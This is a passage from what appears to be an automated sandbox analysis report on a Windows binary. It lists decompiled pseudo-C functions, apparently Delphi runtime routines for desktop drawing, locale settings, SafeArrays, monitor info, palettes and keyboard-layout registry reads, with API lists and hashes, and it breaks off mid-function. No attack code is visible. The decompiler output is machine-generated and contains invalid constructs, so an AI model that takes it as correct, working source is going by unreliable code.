                                            • Opcode ID: e9ce9288913fc68199d18270154c6c7fc1a7a7cbff7d7c20eb0da3e53f774771
                                            • Instruction ID: d64823690b56e9e7649ab6e5b86516b87c2ac410f756eb7b9828f9452d0677e3
                                            • Opcode Fuzzy Hash: e9ce9288913fc68199d18270154c6c7fc1a7a7cbff7d7c20eb0da3e53f774771
                                            • Instruction Fuzzy Hash: 815128B1208751AFC720DB69D8A5F6AB7E8AF89344F04482DF9D6C7362C635E845CB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009700C8, Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 39%
                                            			E009700C8(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HWND__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _t76;
				intOrPtr _t82;
				int _t85;
				void* _t90;
				int _t91;
				void* _t94;
				void* _t95;
				intOrPtr _t96;

				_t94 = _t95;
				_t96 = _t95 + 0xffffffe0;
				_v5 = __ecx;
				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				}
				_v12 = GetDesktopWindow();
				_v16 = GetDCEx(_v12, 0, 0x402);
				_push(_t94);
				_push(0x9701e3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96;
				_v20 = SelectObject(_v16, E0095FE64( *((intOrPtr*)(_t90 + 0x40))));
				_t91 = _v36;
				_t85 = _v32;
				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, "true");
				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push("true");
				return ReleaseDC(_v12, _v16);
			}



















                                            0x009700c9
                                            0x009700cb
                                            0x009700d1
                                            0x009700dd
                                            0x009700e3
                                            0x009700f3
                                            0x009700fa
                                            0x009700fb
                                            0x009700fc
                                            0x009700fd
                                            0x009700fe
                                            0x009700e5
                                            0x009700e5
                                            0x009700ec
                                            0x009700ed
                                            0x009700ee
                                            0x009700ef
                                            0x009700f0
                                            0x009700f0
                                            0x00970104
                                            0x00970117
                                            0x0097011c
                                            0x0097011d
                                            0x00970122
                                            0x00970125
                                            0x0097013a
                                            0x00970146
                                            0x0097014e
                                            0x0097015b
                                            0x0097017d
                                            0x0097019c
                                            0x009701b6
                                            0x009701c3
                                            0x009701ca
                                            0x009701cd
                                            0x009701d0
                                            0x009701e2

                                            APIs
                                            • GetDesktopWindow.USER32 ref: 009700FF
                                            • GetDCEx.USER32(?,00000000,00000402), ref: 00970112
                                            • SelectObject.GDI32(?,00000000), ref: 00970135
                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0097015B
                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0097017D
                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0097019C
                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 009701B6
                                            • SelectObject.GDI32(?,?), ref: 009701C3
                                            • ReleaseDC.USER32 ref: 009701DD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ObjectSelect$DesktopReleaseWindow
                                            • String ID:
                                            • API String ID: 1187665388-0
                                            • Opcode ID: e4385d1f862ec9c84b12d7c7b3f0c198e20e181ddb427122269be6b5c41fee86
                                            • Instruction ID: 37334c68c1aba24fc74c2385387850a2aa951bb7540bfa9e851e25f879f233a4
                                            • Opcode Fuzzy Hash: e4385d1f862ec9c84b12d7c7b3f0c198e20e181ddb427122269be6b5c41fee86
                                            • Instruction Fuzzy Hash: EB31EAB6A00619AFDB00DEECCC99EAFBBBCEF4A714B404464B504F7245C675AD04CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094C590, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E0094C590(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x94c85b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0094C41C();
				E0094AE38(__ebx, __edi, __esi);
				_t196 =  *0x99c750;
				if( *0x99c750 != 0) {
					E0094B010(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0094AD88(_t43, 0, 0x14,  &_v20);
				E00944004(0x99c684, _v20);
				E0094AD88(_t43, 0x94c870, 0x1b,  &_v24);
				 *0x99c688 = E00948138(0x94c870, 0, _t196);
				E0094AD88(_t132, 0x94c870, 0x1c,  &_v28);
				 *0x99c689 = E00948138(0x94c870, 0, _t196);
				 *0x99c68a = E0094ADD4(_t132, 0x2c, 0xf);
				 *0x99c68b = E0094ADD4(_t132, 0x2e, 0xe);
				E0094AD88(_t132, 0x94c870, 0x19,  &_v32);
				 *0x99c68c = E00948138(0x94c870, 0, _t196);
				 *0x99c68d = E0094ADD4(_t132, 0x2f, 0x1d);
				E0094AD88(_t132, "m/d/yy", 0x1f,  &_v40);
				E0094B0C0(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00944004(0x99c690, _v36);
				E0094AD88(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0094B0C0(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00944004(0x99c694, _v44);
				 *0x99c698 = E0094ADD4(_t132, 0x3a, 0x1e);
				E0094AD88(_t132, 0x94c8a4, 0x28,  &_v52);
				E00944004(0x99c69c, _v52);
				E0094AD88(_t132, 0x94c8b0, 0x29,  &_v56);
				E00944004(0x99c6a0, _v56);
				E00943FB0( &_v12);
				E00943FB0( &_v16);
				E0094AD88(_t132, 0x94c870, 0x25,  &_v60);
				_t104 = E00948138(0x94c870, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00944048( &_v8, 0x94c8c8);
				} else {
					E00944048( &_v8, 0x94c8bc);
				}
				E0094AD88(_t132, 0x94c870, 0x23,  &_v64);
				_t111 = E00948138(0x94c870, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0094AD88(_t132, 0x94c870, 0x1005,  &_v68);
					if(E00948138(0x94c870, 0, _t198) != 0) {
						E00944048( &_v12, 0x94c8e4);
					} else {
						E00944048( &_v16, 0x94c8d4);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00944330();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00944330();
				 *0x99c752 = E0094ADD4(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(0x94c862);
				return E00943FD4( &_v68, 0x10);
			}

























                                            0x0094c590
                                            0x0094c590
                                            0x0094c591
                                            0x0094c593
                                            0x0094c598
                                            0x0094c598
                                            0x0094c59a
                                            0x0094c59c
                                            0x0094c59c
                                            0x0094c59f
                                            0x0094c5a2
                                            0x0094c5a3
                                            0x0094c5a8
                                            0x0094c5ab
                                            0x0094c5ae
                                            0x0094c5b3
                                            0x0094c5b8
                                            0x0094c5bf
                                            0x0094c5c1
                                            0x0094c5c1
                                            0x0094c5cb
                                            0x0094c5da
                                            0x0094c5e7
                                            0x0094c5fc
                                            0x0094c60b
                                            0x0094c620
                                            0x0094c62f
                                            0x0094c642
                                            0x0094c655
                                            0x0094c66a
                                            0x0094c679
                                            0x0094c68c
                                            0x0094c6a1
                                            0x0094c6ac
                                            0x0094c6b9
                                            0x0094c6ce
                                            0x0094c6d9
                                            0x0094c6e6
                                            0x0094c6f9
                                            0x0094c70e
                                            0x0094c71b
                                            0x0094c730
                                            0x0094c73d
                                            0x0094c745
                                            0x0094c74d
                                            0x0094c762
                                            0x0094c76c
                                            0x0094c771
                                            0x0094c773
                                            0x0094c78c
                                            0x0094c775
                                            0x0094c77d
                                            0x0094c77d
                                            0x0094c7a1
                                            0x0094c7ab
                                            0x0094c7b0
                                            0x0094c7b2
                                            0x0094c7c4
                                            0x0094c7d5
                                            0x0094c7ee
                                            0x0094c7d7
                                            0x0094c7df
                                            0x0094c7df
                                            0x0094c7d5
                                            0x0094c7f3
                                            0x0094c7f6
                                            0x0094c7f9
                                            0x0094c7fe
                                            0x0094c80b
                                            0x0094c810
                                            0x0094c813
                                            0x0094c816
                                            0x0094c81b
                                            0x0094c828
                                            0x0094c83b
                                            0x0094c842
                                            0x0094c845
                                            0x0094c848
                                            0x0094c85a

                                            APIs
                                            • GetThreadLocale.KERNEL32(00000000,0094C85B,?,?,00000000,00000000), ref: 0094C5C6
                                              • Part of subcall function 0094AD88: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0094ADA6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Locale$InfoThread
                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                            • API String ID: 4232894706-2493093252
                                            • Opcode ID: c972ec107ddc4f008754ee133c120786efb41d1bef6d8b1aef48f0439a96fea5
                                            • Instruction ID: 79813b225a7ad7d61525dee4f1cff75e0347a916de512d75c8e9f0aa246f00ab
                                            • Opcode Fuzzy Hash: c972ec107ddc4f008754ee133c120786efb41d1bef6d8b1aef48f0439a96fea5
                                            • Instruction Fuzzy Hash: 64615AB0B052499BDB50FBB8DC91F9E73B69BC9340F509439F100AB746DA38DD0A9B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094EB78, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E0094EB78(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0094E720(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0094D4D4();
					return E0094E720(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0094D928();
						_t113 = _t54;
						if(_t113 == 0) {
							E0094E478(_t100);
						}
						E0094EAD0(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0094EAEC(_v788 - 1, _t115) != 0) {
								L0094D940();
								E0094E720(_v792);
								L0094D940();
								E0094E720( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0094EB1C(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0094D930();
							E0094E720(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0094D938();
							E0094E720(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                            0x0094eb78
                                            0x0094eb84
                                            0x0094eb8a
                                            0x0094eb8c
                                            0x0094eb96
                                            0x0094eb9d
                                            0x0094eb9d
                                            0x0094eba2
                                            0x0094ebb0
                                            0x0094ed29
                                            0x0094ed30
                                            0x0094ed31
                                            0x00000000
                                            0x0094ebb6
                                            0x0094ebb9
                                            0x0094ebcb
                                            0x0094ebbb
                                            0x0094ebc0
                                            0x0094ebc0
                                            0x0094ebda
                                            0x0094ebe6
                                            0x0094ebe9
                                            0x0094ec56
                                            0x0094ec5c
                                            0x0094ec5d
                                            0x0094ec63
                                            0x0094ec64
                                            0x0094ec66
                                            0x0094ec6b
                                            0x0094ec6f
                                            0x0094ec71
                                            0x0094ec71
                                            0x0094ec7c
                                            0x0094ec87
                                            0x0094ec92
                                            0x0094ec9b
                                            0x0094ec9e
                                            0x0094ecba
                                            0x0094ecc1
                                            0x0094eccc
                                            0x0094ece3
                                            0x0094ece8
                                            0x0094ecfc
                                            0x0094ed01
                                            0x0094ed14
                                            0x0094ed14
                                            0x0094ed1d
                                            0x0094eca0
                                            0x0094eca0
                                            0x0094eca1
                                            0x0094eca7
                                            0x0094ecad
                                            0x0094ecaf
                                            0x0094ecb1
                                            0x0094ecb4
                                            0x0094ecb7
                                            0x0094ecb7
                                            0x0094ecba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0094ecba
                                            0x0094ebeb
                                            0x0094ebeb
                                            0x0094ebec
                                            0x0094ebee
                                            0x0094ebf4
                                            0x0094ebf6
                                            0x0094ec05
                                            0x0094ec06
                                            0x0094ec10
                                            0x0094ec11
                                            0x0094ec16
                                            0x0094ec21
                                            0x0094ec22
                                            0x0094ec2c
                                            0x0094ec2d
                                            0x0094ec32
                                            0x0094ec4d
                                            0x0094ec4f
                                            0x0094ec50
                                            0x0094ec53
                                            0x0094ec53
                                            0x00000000
                                            0x0094ebf4
                                            0x0094ebe9

                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0094EC11
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0094EC2D
                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0094EC66
                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0094ECE3
                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0094ECFC
                                            • VariantCopy.OLEAUT32(?), ref: 0094ED31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                            • String ID:
                                            • API String ID: 351091851-3916222277
                                            • Opcode ID: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
                                            • Instruction ID: 835ff973f7f71e21b9021cd68eb7146742ef133c23c55c27ba9d7083254f2514
                                            • Opcode Fuzzy Hash: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
                                            • Instruction Fuzzy Hash: 2651E779A0162D9BCB26DB58C881FD9B3BDBF88310F0045D5F549E7212DA70AF858F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009655CC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E009655CC(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x99c92c != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L0094647C();
						}
						_t24 = 1;
					}
				} else {
					 *0x99c910 = E0096529C(4, _t23,  *0x99c910, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                            0x009655d5
                                            0x009655d8
                                            0x009655e2
                                            0x00965607
                                            0x0096560f
                                            0x0096562f
                                            0x00965634
                                            0x0096563f
                                            0x0096564a
                                            0x00965654
                                            0x00965655
                                            0x00965656
                                            0x00965657
                                            0x00965658
                                            0x00965659
                                            0x00965663
                                            0x00965665
                                            0x0096566d
                                            0x0096566e
                                            0x0096566e
                                            0x00965673
                                            0x00965673
                                            0x009655e4
                                            0x009655f6
                                            0x00965603
                                            0x00965603
                                            0x0096567d

                                            APIs
                                            • GetMonitorInfoA.USER32(?,?), ref: 009655FD
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00965624
                                            • GetSystemMetrics.USER32 ref: 00965639
                                            • GetSystemMetrics.USER32 ref: 00965644
                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0096566E
                                              • Part of subcall function 0096529C: GetClassInfoExW.USER32 ref: 009652AD
                                              • Part of subcall function 0096529C: GetProcAddress.KERNEL32(73FA0000,00000000), ref: 0096531C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoSystem$Metrics$AddressClassMonitorParametersProclstrcpy
                                            • String ID: DISPLAY$GetMonitorInfo
                                            • API String ID: 2049762623-1633989206
                                            • Opcode ID: dbf15cd708d3751c207799aae2e61f10346ae85fa702b02e32c010c85775210c
                                            • Instruction ID: 032dbf70f8c26bb8a8fa2de8f1fb5f4940a8bb6797781020873bf10c7350cb94
                                            • Opcode Fuzzy Hash: dbf15cd708d3751c207799aae2e61f10346ae85fa702b02e32c010c85775210c
                                            • Instruction Fuzzy Hash: C51157B1606B00AFE720CF68CC44BA7B7E8FB05314F81092AEC55D7260D3B1A940CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00943E34, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00943E34(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x99c04c == 0) {
					if( *0x99a030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x99c220 == 0xd7b2 &&  *0x99c228 > 0) {
						 *0x99c238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00943EBC, 2,  &_v4, 0);
				}
			}





                                            0x00943e3c
                                            0x00943e9c
                                            0x00943eac
                                            0x00943eac
                                            0x00943eb2
                                            0x00943e3e
                                            0x00943e47
                                            0x00943e57
                                            0x00943e57
                                            0x00943e73
                                            0x00943e94
                                            0x00943e94

                                            APIs
                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00999434,00000000,?,00943F02,?,?,0099C638,?,?,0099A0BC,009460F5,00999434), ref: 00943E6D
                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00999434,00000000,?,00943F02,?,?,0099C638,?,?,0099A0BC,009460F5,00999434), ref: 00943E73
                                            • GetStdHandle.KERNEL32(000000F5,00943EBC,00000002,00999434,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00999434,00000000,?,00943F02,?,?,0099C638), ref: 00943E88
                                            • WriteFile.KERNEL32(00000000,000000F5,00943EBC,00000002,00999434,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00999434,00000000,?,00943F02,?,?), ref: 00943E8E
                                            • MessageBoxA.USER32 ref: 00943EAC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileHandleWrite$Message
                                            • String ID: Error$Runtime error at 00000000
                                            • API String ID: 1570097196-2970929446
                                            • Opcode ID: a784b3e01ca88f73541a916e6e81c48deba8e9f32576195c736e55ae7c79f95d
                                            • Instruction ID: ebd0a474724cc3312438d589e05f64d80c060661fdc1f74bfad287f5bf44175c
                                            • Opcode Fuzzy Hash: a784b3e01ca88f73541a916e6e81c48deba8e9f32576195c736e55ae7c79f95d
                                            • Instruction Fuzzy Hash: 91F054A16593847AFE24B3F89C46F9F265C97C5F28F508616B230E80D2D7F485C49B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00960DE8, Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E00960DE8(void* __ebx) {
				struct HDC__* _v8;
				struct tagPALETTEENTRY _v1000;
				struct tagPALETTEENTRY _v1004;
				struct tagPALETTEENTRY _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				int _t53;
				intOrPtr _t60;
				void* _t62;
				void* _t63;

				_t62 = _t63;
				_v1036 = 0x300;
				_v1034 = 0x10;
				E009428F8(_t24, 0x40,  &_v1032);
				_v8 = GetDC(0);
				_push(_t62);
				_push(0x960ee5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t63 + 0xfffffbf8;
				_t53 = GetDeviceCaps(_v8, 0x68);
				if(_t53 >= 0x10) {
					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
					if(_v1004 != 0xc0c0c0) {
						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
					} else {
						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(0x960eec);
				return ReleaseDC(0, _v8);
			}














                                            0x00960de9
                                            0x00960df2
                                            0x00960dfb
                                            0x00960e0f
                                            0x00960e1b
                                            0x00960e20
                                            0x00960e21
                                            0x00960e26
                                            0x00960e29
                                            0x00960e37
                                            0x00960e3c
                                            0x00960e51
                                            0x00960e60
                                            0x00960ec7
                                            0x00960e62
                                            0x00960e75
                                            0x00960e93
                                            0x00960ea7
                                            0x00960ea7
                                            0x00960e60
                                            0x00960ece
                                            0x00960ed1
                                            0x00960ed4
                                            0x00960ee4

                                            APIs
                                            • GetDC.USER32 ref: 00960E16
                                            • GetDeviceCaps.GDI32(?,00000068), ref: 00960E32
                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00960E51
                                            • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00960E75
                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00960E93
                                            • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00960EA7
                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00960EC7
                                            • ReleaseDC.USER32 ref: 00960EDF
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                            • String ID:
                                            • API String ID: 1781840570-0
                                            • Opcode ID: 95b30ad98f0e8b7008a37828a47ef145bb568e2cb7df3b4545e215b16d7c39e6
                                            • Instruction ID: ceedbf95c2f11af8bf10e6909e85169aca9dc787ff45c9ef4ef83eb7d29701b0
                                            • Opcode Fuzzy Hash: 95b30ad98f0e8b7008a37828a47ef145bb568e2cb7df3b4545e215b16d7c39e6
                                            • Instruction Fuzzy Hash: 7A215EF1A40318AADB10DBA4CD86FAE77BCEB89704F500891FB04E7181D676AE54DB25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0098C774, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 76%
                                            			E0098C774(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x98c91f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x98c926);
					return E00943FB0( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E009430FC(1);
					E00943FB0(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00958818( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E0097A760( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00948C10( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x98c8db);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00944220( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00944220(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
